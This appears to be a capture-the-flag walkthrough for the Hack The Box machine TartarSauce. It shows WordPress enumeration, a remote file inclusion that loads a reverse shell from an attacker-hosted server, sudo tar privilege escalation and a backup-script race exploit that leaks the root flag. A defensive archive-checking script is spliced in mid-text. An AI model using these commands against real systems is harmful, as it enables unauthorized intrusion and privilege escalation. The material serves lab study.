HTB Lab Series: Linux box TartarSauce


Recon

Scan straight away with nmap

root@kali:~/hackthebox/tartarsauce-10.10.10.88# nmap 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 12:21 EDT
Warning: 10.10.10.88 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.88
Host is up (0.098s latency).
Not shown: 65467 closed ports, 67 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 26.34 seconds

root@kali:~/hackthebox/tartarsauce-10.10.10.88# nmap -sCV -p 80 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 12:25 EDT
Nmap scan report for 10.10.10.88
Host is up (0.095s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds

It is a pure web box, so scan it with dirsearch

Port 80 recon

dirsearch shows the site has a robots.txt file

It lists five directories, but all five are rabbit holes; I wasted a lot of time on those pages...

But it also exposes a path, /webservices

Brute-forcing that path with gobuster and a wordlist turns up a /wp directory, which suggests WordPress is installed

Since there is WordPress, we dig further

wpscan --url http://tartarsauce.htb/webservices/wp/
wpscan --url http://tartarsauce.htb/webservices/wp/ --enumerate p,t,u
wpscan --url http://tartarsauce.htb/webservices/wp --enumerate p --plugins-detection aggressive

The box author played a trick here: the plugin version was changed to report as 2.x, but it is really still 1.5, so wpscan has to run in aggressive mode

This can be seen in the plugin's readme

_______________________________________________________________
        WordPress Security Scanner by the WPScan Team
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
...
[+] We found 3 plugins:

[+] Name: akismet - v4.0.3
 |  Last updated: 2018-05-26T17:14:00.000Z
 |  Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
 |  Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
[!] The version is out of date, the latest version is 4.0.6

[+] Name: brute-force-login-protection - v1.5.3
 |  Latest version: 1.5.3 (up to date)
 |  Last updated: 2017-06-29T10:39:00.000Z
 |  Location: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/
 |  Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt

[+] Name: gwolle-gb - v2.3.10
 |  Last updated: 2018-05-12T10:06:00.000Z
 |  Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
 |  Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
[!] The version is out of date, the latest version is 2.5.2

[+] Enumerating installed themes (only ones marked as popular) ...
...

Getting a shell as www-data

We found gwolle, so let's try gwolle's remote file inclusion

The concrete steps are as follows (the exploit author's PoC can be found in searchsploit)

1. Start a small HTTP server with python

python -m SimpleHTTPServer 12345

Note that the directory you run this from is the directory the server shares

2. In the shared folder create a reverse shell script named wp-load.php. I used /usr/share/webshells/php/php-reverse-shell.php (the msf one); remember to change the host and port inside it

Why that filename? Simply for convenience

└─# python -m SimpleHTTPServer 12345
Serving HTTP on 0.0.0.0 port 12345 ...
    10.10.10.88 - - [28/Dec/2021 19:38:11] "GET /wp-load.php HTTP/1.0" 200 -
10.10.10.88 - - [28/Dec/2021 20:07:40] "GET /b.sh HTTP/1.1" 200 -

While testing I found the inclusion fetches this file directly, so there is no need to add the filename to the URL

3. Start an nc listener

4. Request the link with curl, or just open it in a browser

curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.3:12345/

Note: change the port to the one in your own script, and the URL must end with a trailing / after the port

Then the shell connects back

Privilege escalation to onuma

The usual sudo -l shows tar can be run as onuma

$ sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar

So exploit it

$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
tar: Removing leading `/' from member names
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)

For other tar privilege escalation methods and how they work, see my other article

Privilege escalation to root

A find turns up nothing usable

We already checked sudo; nothing there runs as root

Use pspy to watch processes

./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2021/12/28 04:09:07 CMD: UID=0    PID=95     | 
2021/12/28 04:09:07 CMD: UID=0    PID=936    | /usr/lib/policykit-1/polkitd --no-debug                                                                    
2021/12/28 04:09:07 CMD: UID=0    PID=919    | /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog                        
2021/12/28 04:09:07 CMD: UID=0    PID=9      | 
2021/12/28 04:09:07 CMD: UID=0    PID=85     | 
2021/12/28 04:09:07 CMD: UID=0    PID=83     | 
2021/12/28 04:09:07 CMD: UID=0    PID=82     | 
2021/12/28 04:09:07 CMD: UID=0    PID=81     | 
2021/12/28 04:09:07 CMD: UID=108  PID=805    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation                 
2021/12/28 04:09:07 CMD: UID=0    PID=804    | /usr/lib/snapd/snapd 
2021/12/28 04:09:07 CMD: UID=0    PID=803    | /usr/bin/vmtoolsd 
2021/12/28 04:09:07 CMD: UID=104  PID=801    | /usr/sbin/rsyslogd -n 
2021/12/28 04:09:07 CMD: UID=0    PID=800    | /usr/sbin/atd -f 
2021/12/28 04:09:07 CMD: UID=0    PID=80     | 
2021/12/28 04:09:07 CMD: UID=0    PID=8      | 
2021/12/28 04:09:07 CMD: UID=0    PID=799    | /usr/sbin/cron -f 
2021/12/28 04:09:07 CMD: UID=0    PID=795    | /usr/lib/accountsservice/accounts-daemon                                                                   
2021/12/28 04:09:07 CMD: UID=0    PID=794    | /usr/bin/lxcfs /var/lib/lxcfs/                                                                             
2021/12/28 04:09:07 CMD: UID=0    PID=792    | /lib/systemd/systemd-logind 
2021/12/28 04:09:07 CMD: UID=0    PID=79     | 
2021/12/28 04:09:07 CMD: UID=0    PID=789    | /usr/sbin/acpid 
2021/12/28 04:09:07 CMD: UID=0    PID=78     | 
2021/12/28 04:09:07 CMD: UID=0    PID=77     | 
2021/12/28 04:09:07 CMD: UID=0    PID=7      | 
2021/12/28 04:09:07 CMD: UID=100  PID=676    | /lib/systemd/systemd-timesyncd                                                                             
2021/12/28 04:09:07 CMD: UID=1000 PID=6558   | ./pspy32 
2021/12/28 04:09:07 CMD: UID=1000 PID=6511   | /bin/bash 
2021/12/28 04:09:07 CMD: UID=1000 PID=6510   | tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash                              
2021/12/28 04:09:07 CMD: UID=0    PID=6509   | sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash                
2021/12/28 04:09:07 CMD: UID=0    PID=648    | 
2021/12/28 04:09:07 CMD: UID=33   PID=6383   | /bin/sh -i 
2021/12/28 04:09:07 CMD: UID=33   PID=6379   | sh -c uname -a; w; id; /bin/sh -i 
2021/12/28 04:09:07 CMD: UID=0    PID=6365   | 
2021/12/28 04:09:07 CMD: UID=0    PID=6252   | 
2021/12/28 04:09:07 CMD: UID=0    PID=6250   | 
2021/12/28 04:09:07 CMD: UID=33   PID=6249   | /usr/sbin/apache2 -k start 
2021/12/28 04:09:07 CMD: UID=0    PID=6      | 
2021/12/28 04:09:07 CMD: UID=0    PID=5971   | 
2021/12/28 04:09:07 CMD: UID=0    PID=432    | 
2021/12/28 04:09:07 CMD: UID=0    PID=426    | /lib/systemd/systemd-udevd 
2021/12/28 04:09:07 CMD: UID=0    PID=425    | /sbin/lvmetad -f 
2021/12/28 04:09:07 CMD: UID=0    PID=406    | 
2021/12/28 04:09:07 CMD: UID=0    PID=405    | 
2021/12/28 04:09:07 CMD: UID=0    PID=404    | 
2021/12/28 04:09:07 CMD: UID=0    PID=401    | 
2021/12/28 04:09:07 CMD: UID=0    PID=400    | /lib/systemd/systemd-journald 
2021/12/28 04:09:07 CMD: UID=0    PID=4      | 
2021/12/28 04:09:07 CMD: UID=0    PID=35     | 
2021/12/28 04:09:07 CMD: UID=0    PID=348    | 
2021/12/28 04:09:07 CMD: UID=0    PID=347    | 
2021/12/28 04:09:07 CMD: UID=0    PID=34     | 
2021/12/28 04:09:07 CMD: UID=0    PID=307    | 
2021/12/28 04:09:07 CMD: UID=0    PID=306    | 
2021/12/28 04:09:07 CMD: UID=0    PID=30     | 
2021/12/28 04:09:07 CMD: UID=0    PID=297    | 
2021/12/28 04:09:07 CMD: UID=0    PID=296    | 
2021/12/28 04:09:07 CMD: UID=0    PID=29     | 
2021/12/28 04:09:07 CMD: UID=0    PID=28     | 
2021/12/28 04:09:07 CMD: UID=0    PID=272    | 
2021/12/28 04:09:07 CMD: UID=0    PID=27     | 
2021/12/28 04:09:07 CMD: UID=0    PID=26     | 
2021/12/28 04:09:07 CMD: UID=0    PID=25     | 
2021/12/28 04:09:07 CMD: UID=0    PID=24     | 
2021/12/28 04:09:07 CMD: UID=0    PID=23     | 
2021/12/28 04:09:07 CMD: UID=0    PID=22     | 
2021/12/28 04:09:07 CMD: UID=0    PID=21     | 
2021/12/28 04:09:07 CMD: UID=0    PID=20     | 
2021/12/28 04:09:07 CMD: UID=0    PID=2      | 
2021/12/28 04:09:07 CMD: UID=0    PID=199    | 
2021/12/28 04:09:07 CMD: UID=0    PID=197    | 
2021/12/28 04:09:07 CMD: UID=0    PID=194    | 
2021/12/28 04:09:07 CMD: UID=0    PID=19     | 
2021/12/28 04:09:07 CMD: UID=0    PID=18     | 
2021/12/28 04:09:07 CMD: UID=0    PID=172    | 
2021/12/28 04:09:07 CMD: UID=0    PID=171    | 
2021/12/28 04:09:07 CMD: UID=0    PID=170    | 
2021/12/28 04:09:07 CMD: UID=0    PID=17     | 
2021/12/28 04:09:07 CMD: UID=0    PID=16     | 
2021/12/28 04:09:07 CMD: UID=0    PID=15     | 
2021/12/28 04:09:07 CMD: UID=0    PID=14     | 
2021/12/28 04:09:07 CMD: UID=33   PID=1395   | /usr/sbin/apache2 -k start 
2021/12/28 04:09:07 CMD: UID=0    PID=13     | 
2021/12/28 04:09:07 CMD: UID=33   PID=1230   | /usr/sbin/apache2 -k start 
2021/12/28 04:09:07 CMD: UID=33   PID=1229   | /usr/sbin/apache2 -k start 
2021/12/28 04:09:07 CMD: UID=33   PID=1228   | /usr/sbin/apache2 -k start 
2021/12/28 04:09:07 CMD: UID=33   PID=1227   | /usr/sbin/apache2 -k start 
2021/12/28 04:09:07 CMD: UID=33   PID=1226   | /usr/sbin/apache2 -k start 
2021/12/28 04:09:07 CMD: UID=0    PID=1209   | /usr/sbin/apache2 -k start 
2021/12/28 04:09:07 CMD: UID=0    PID=12     | 
2021/12/28 04:09:07 CMD: UID=0    PID=1145   | /sbin/agetty --noclear tty1 linux                                                                          
2021/12/28 04:09:07 CMD: UID=0    PID=112    | 
2021/12/28 04:09:07 CMD: UID=107  PID=1116   | /usr/sbin/mysqld 
2021/12/28 04:09:07 CMD: UID=0    PID=1108   | /sbin/iscsid 
2021/12/28 04:09:07 CMD: UID=0    PID=1107   | /sbin/iscsid 
2021/12/28 04:09:07 CMD: UID=0    PID=11     | 
2021/12/28 04:09:07 CMD: UID=0    PID=10     | 
2021/12/28 04:09:07 CMD: UID=0    PID=1      | /sbin/init 
2021/12/28 04:10:04 CMD: UID=0    PID=6580   | /lib/systemd/systemd-udevd 
2021/12/28 04:10:04 CMD: UID=0    PID=6579   | /lib/systemd/systemd-udevd 
2021/12/28 04:10:04 CMD: UID=0    PID=6578   | /lib/systemd/systemd-udevd 
2021/12/28 04:10:04 CMD: UID=0    PID=6577   | /lib/systemd/systemd-udevd 
2021/12/28 04:10:04 CMD: UID=0    PID=6576   | /lib/systemd/systemd-udevd 
2021/12/28 04:10:04 CMD: UID=0    PID=6575   | cut -d  -f1 
2021/12/28 04:10:04 CMD: UID=0    PID=6574   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:04 CMD: UID=0    PID=6573   | 
2021/12/28 04:10:04 CMD: UID=0    PID=6572   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:04 CMD: UID=0    PID=6571   | /lib/systemd/systemd-udevd 
2021/12/28 04:10:04 CMD: UID=0    PID=6570   | /lib/systemd/systemd-udevd 
2021/12/28 04:10:04 CMD: UID=0    PID=6569   | /lib/systemd/systemd-udevd 
2021/12/28 04:10:04 CMD: UID=0    PID=6568   | /lib/systemd/systemd-udevd 
2021/12/28 04:10:04 CMD: UID=0    PID=6567   | /lib/systemd/systemd-udevd 
2021/12/28 04:10:04 CMD: UID=0    PID=6566   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:04 CMD: UID=0    PID=6583   | 
2021/12/28 04:10:04 CMD: UID=0    PID=6582   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:04 CMD: UID=0    PID=6581   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:04 CMD: UID=0    PID=6584   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6586   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:04 CMD: UID=0    PID=6596   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6605   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6609   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6611   | 
2021/12/28 04:10:04 CMD: UID=0    PID=6613   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6615   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6617   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6618   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6620   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6622   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:04 CMD: UID=0    PID=6624   | 
2021/12/28 04:10:04 CMD: UID=0    PID=6626   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6633   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:04 CMD: UID=0    PID=6634   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6637   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:04 CMD: UID=0    PID=6639   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6643   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:04 CMD: UID=0    PID=6644   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6647   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:04 CMD: UID=0    PID=6649   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:04 CMD: UID=0    PID=6650   | 
2021/12/28 04:10:04 CMD: UID=0    PID=6653   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6655   | /usr/bin/printf - 
2021/12/28 04:10:04 CMD: UID=0    PID=6662   | /bin/sleep 30 
2021/12/28 04:10:04 CMD: UID=0    PID=6661   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:04 CMD: UID=1000 PID=6665   | /bin/tar -zcvf /var/tmp/.1beeeb196d0924b2bfdec12dc9ba71e68ba43b8c /var/www/html                            
2021/12/28 04:10:04 CMD: UID=1000 PID=6666   | gzip 
2021/12/28 04:10:34 CMD: UID=0    PID=6672   | gzip -d 
2021/12/28 04:10:34 CMD: UID=0    PID=6671   | /bin/tar -zxvf /var/tmp/.1beeeb196d0924b2bfdec12dc9ba71e68ba43b8c -C /var/tmp/check                        
2021/12/28 04:10:35 CMD: UID=0    PID=6674   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:35 CMD: UID=0    PID=6673   | /bin/bash /usr/sbin/backuperer                                                                             
2021/12/28 04:10:36 CMD: UID=0    PID=6675   | /bin/mv /var/tmp/.1beeeb196d0924b2bfdec12dc9ba71e68ba43b8c /var/backups/onuma-www-dev.bak                  
2021/12/28 04:10:36 CMD: UID=0    PID=6676   | /bin/rm -rf /var/tmp/check . ..                                                                            
2021/12/28 04:10:36 CMD: UID=0    PID=6677   | 
2021/12/28 04:10:36 CMD: UID=0    PID=6680   | 

File analysis

There is a /usr/sbin/backuperer, which looks suspicious

This is what the file does

cat backuperer
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

After inspecting this shell script we worked through its execution flow

Roughly:

1. First write a marker file recording when the script last ran

2. Delete last run's temporary files

3. Back up the web files as a compressed archive in the temp directory

4. Sleep 30 seconds

5. Create a check directory in the temp directory

6. Extract the archive just created into the check directory

7. Compare the contents of the check directory with the source directory; if they are identical, delete the temporary files

8. If they differ, write an error message to the error log, along with the diff output, i.e. the content of the two files that differ

Procedure

So the plan is clear: during the thirty seconds the script sleeps after finishing the backup, open the archive, replace one of its files with /root/root.txt, repack the archive, remove the original, and then read the root file from the error report

But there is no way to type all those steps within thirty seconds

So we need a script

Here I borrow the script written by 0xdf
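The flow above trusts an archive that sat in a world-writable directory for thirty seconds, then extracts it and diffs it as root. The following is an added example (not the box's backuperer script or anything from the writeup): it pins the archive digest at creation time and refuses to extract a file that no longer matches, or whose listing contains symlinks, hard links, absolute paths or ".." components. It assumes GNU tar, sha256sum and mktemp, and builds its own constructed fixtures under a temp directory rather than the box's /var/tmp.

```shell
#!/bin/bash
# Added example (not the box's backuperer script): the two checks it lacks.
# The archive digest is pinned right after creation, and nothing is extracted
# unless the file still matches that digest AND its listing contains only
# regular files and directories with relative names.
# All paths are constructed fixtures under mktemp, not the box's /var/tmp.

archive_digest() {
    sha256sum "$1" | cut -d' ' -f1
}

# Returns 0 if the listing has no symlink/hard-link members, no absolute
# paths and no ".." components. GNU tar autodetects gzip when reading, so
# this works for -z archives like backuperer's as well as plain tar files.
archive_is_safe() {
    # First character of the mode column is the member type: l = symlink,
    # h = hard link. A symlink member is what turns "diff -r" run as root
    # into a read of whatever the link points at.
    if tar -tvf "$1" | grep -q '^[lh]'; then
        return 1
    fi
    # A leading / or a .. component lets a member land outside -C dest.
    if tar -tf "$1" | grep -Eq '^/|(^|/)\.\.(/|$)'; then
        return 1
    fi
    return 0
}

# Extract only if the pinned digest still matches and the listing is safe;
# otherwise touch nothing and return 1.
verified_extract() {
    local archive="$1" expected="$2" dest="$3"
    [ "$(archive_digest "$archive")" = "$expected" ] || return 1
    archive_is_safe "$archive" || return 1
    mkdir -p "$dest" && tar -xf "$archive" -C "$dest"
}

# Constructed fixtures: a clean archive, and one where robots.txt has been
# swapped for a dangling placeholder symlink. Prints the work directory.
make_fixtures() {
    local work
    work=$(mktemp -d)
    mkdir -p "$work/src/var/www/html"
    printf 'User-agent: *\n' > "$work/src/var/www/html/robots.txt"
    tar -C "$work/src" -cf "$work/good.tar" var
    cp -r "$work/src" "$work/evil"
    rm "$work/evil/var/www/html/robots.txt"
    ln -s /placeholder/not-a-real-target "$work/evil/var/www/html/robots.txt"
    tar -C "$work/evil" -cf "$work/evil.tar" var
    echo "$work"
}

main() {
    local work pinned
    work=$(make_fixtures)
    pinned=$(archive_digest "$work/good.tar")
    verified_extract "$work/good.tar" "$pinned" "$work/check" \
        && echo "clean archive: extracted"
    # Simulate the race: the archive is swapped under the same filename.
    cp "$work/evil.tar" "$work/good.tar"
    verified_extract "$work/good.tar" "$pinned" "$work/check2" \
        || echo "swapped archive: rejected"
    rm -rf "$work"
}
main
```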

#!/bin/bash

# work out of shm
cd /dev/shm

# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")

# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
    sleep 10;
    cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done

# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .

# get filename
fn=$(echo $cur | cut -d'/' -f4)

# extract archive
tar -zxf $fn

# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt

# remove old archive
rm $fn

# create new archive
tar czf $fn var

# put it back, and clean up
mv $fn $cur
rm $fn
rm -rf var

# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt

Result

onuma@TartarSauce:/dev/shm$ ./.b.sh
./.b.sh
Waiting for archive filename to change...
File changed... copying here
Waiting for new logs...
------------------------------------------------------------------------
Integrity Check Error in backup last ran :  Thu Oct 18 19:42:26 EDT 2018
------------------------------------------------------------------------
/var/tmp/.02af91fa0edeab13fce3962cddc45efefc22da67
diff -r /var/www/html/robots.txt /var/tmp/check/var/www/html/robots.txt
1,7c1
< User-agent: *
< Disallow: /webservices/tar/tar/source/
< Disallow: /webservices/monstra-3.0.4/
< Disallow: /webservices/easy-file-uploader/
< Disallow: /webservices/developmental/
< Disallow: /webservices/phpmyadmin/
<
---
> e79abdab...

Thanks

The script provided by 0xdf

The tar exploitation article mentioned above